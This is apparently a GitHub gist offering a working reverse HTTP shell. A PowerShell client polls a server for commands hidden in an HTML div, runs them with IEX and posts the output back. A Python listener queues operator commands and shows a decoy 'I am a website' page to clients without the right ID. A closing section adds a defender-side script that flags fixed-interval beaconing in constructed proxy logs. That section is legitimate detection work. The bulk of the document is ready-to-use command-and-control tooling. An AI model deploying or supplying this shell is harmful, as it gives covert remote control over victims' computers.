@FrankSpierings
Last active December 12, 2019 14:27
Reverse HTTP Shell Powershell/Python
```powershell
$url = "http://10.0.0.254:8000";
$clientid = "1234567";
$polltime = 5;
$wc = New-Object System.Net.WebClient;
$whc = New-Object System.Net.WebHeaderCollection;
# Every request carries a static client id in a custom header.
$whc.Add("X-Client-Id", $clientid)
$wc.Headers = $whc
while ($true) {
    # Poll the server at a fixed interval and look for a command in a div with class "execute".
    $resp = $wc.DownloadString($url);
    if ($resp -match '(?si)<div .*?class="execute"\>\s*(?<command>.*?)\s*</div>') {
        $command = $Matches['command'];
        $Error.Clear();
        try {
            $output = ($command | IEX | Out-String);
        }
        catch {
            $output = $Error;
        }
        # Output (or the error record) is sent back as the POST body.
        $wc.UploadString($url, $output) | Out-Null;
    }
    Start-Sleep $polltime;
}
```
```python
import queue
import readline  # imported for its side effect: line editing/history for input()
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading

bindaddress = '0.0.0.0'
bindport = 8000
bindclient = '1234567'
commandqueue = queue.Queue()


class Handler(BaseHTTPRequestHandler):
    def log_message(self, format, *args):
        # Suppress the default per-request logging.
        pass

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        # Only a request carrying the expected X-Client-Id gets a queued command;
        # everyone else sees a placeholder page.
        if (self.headers.get('X-Client-Id') == bindclient and not commandqueue.empty()):
            self.wfile.write('<html>\n<body>\n<div class="execute">\n{cmd}\n</div>\n</body>\n</html>'.format(cmd=commandqueue.get()).encode())
        else:
            self.wfile.write(b'<html>\n<body>\nI am a website :)\n</body>\n</html>')

    def do_POST(self):
        # The POST body is the command output; print it and re-show the prompt.
        body = self.rfile.read(int(self.headers.get('content-length')))
        body = body.decode()
        body += '\n$ '
        print(body, end='')
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'<html>\n<body>\nThanks\n</body>\n</html>')


class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
    pass


httpd = ThreadingSimpleServer((bindaddress, bindport), Handler)
th_webserver = threading.Thread(target=httpd.serve_forever)
th_webserver.start()
try:
    while True:
        cmd = input('$ ')
        if (cmd.strip() != ''):
            commandqueue.put(cmd)
except KeyboardInterrupt:
    httpd.server_close()
```
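From the defender's side, the traffic this pair produces is distinctive: one source repeatedly fetching the same URL at a fixed interval, always with the same custom `X-Client-Id` header, and occasionally POSTing to that URL. The following script is an added example, not part of the gist, that flags that beaconing shape in proxy-style log lines; the log format and the sample lines are constructed for illustration.

```python
"""Flag fixed-interval polling with a static custom client id in proxy logs.
Added defender-side example; log format and sample lines are constructed."""
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed format: "<epoch> <src_ip> <method> <url>[ hdr:X-Client-Id=<id>]"
LOG_RE = re.compile(r'^(?P<ts>\d+) (?P<src>\S+) (?P<method>GET|POST) (?P<url>\S+)'
                    r'(?: hdr:X-Client-Id=(?P<cid>\S+))?$')


def parse(lines):
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def find_beacons(lines, min_polls=4, max_jitter=1.0):
    """Return {(src, url): info} for sources whose GET gaps to one URL are
    near-constant (std-dev of gaps <= max_jitter), with POST count and ids."""
    gets, posts, ids = defaultdict(list), defaultdict(int), defaultdict(set)
    for r in parse(lines):
        key = (r['src'], r['url'])
        if r['method'] == 'GET':
            gets[key].append(int(r['ts']))
        else:
            posts[key] += 1
        if r['cid']:
            ids[key].add(r['cid'])
    hits = {}
    for key, ts in gets.items():
        if len(ts) < min_polls:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if pstdev(gaps) <= max_jitter:
            hits[key] = {'interval': round(mean(gaps), 1), 'polls': len(ts),
                         'posts': posts[key], 'client_ids': sorted(ids[key])}
    return hits


# Constructed sample: a 5-second poll with a static id, plus irregular browsing noise.
SAMPLE = [
    "1000 10.0.0.7 GET http://10.0.0.254:8000/ hdr:X-Client-Id=1234567",
    "1005 10.0.0.7 GET http://10.0.0.254:8000/ hdr:X-Client-Id=1234567",
    "1006 10.0.0.7 POST http://10.0.0.254:8000/ hdr:X-Client-Id=1234567",
    "1010 10.0.0.7 GET http://10.0.0.254:8000/ hdr:X-Client-Id=1234567",
    "1015 10.0.0.7 GET http://10.0.0.254:8000/ hdr:X-Client-Id=1234567",
    "1020 10.0.0.7 GET http://10.0.0.254:8000/ hdr:X-Client-Id=1234567",
    "1001 10.0.0.9 GET http://intranet.example/", "1047 10.0.0.9 GET http://intranet.example/",
    "1090 10.0.0.9 GET http://intranet.example/", "1210 10.0.0.9 GET http://intranet.example/",
]

if __name__ == '__main__':
    for (src, url), info in find_beacons(SAMPLE).items():
        print(f"{src} -> {url}: every ~{info['interval']}s, {info['polls']} polls, "
              f"{info['posts']} posts, ids={info['client_ids']}")
```

Real deployments would read the header from a proxy that logs it and tune `max_jitter` to the observed noise; a sleep with random jitter widens the gap spread, so pairing this with the static header value matters more than the interval alone.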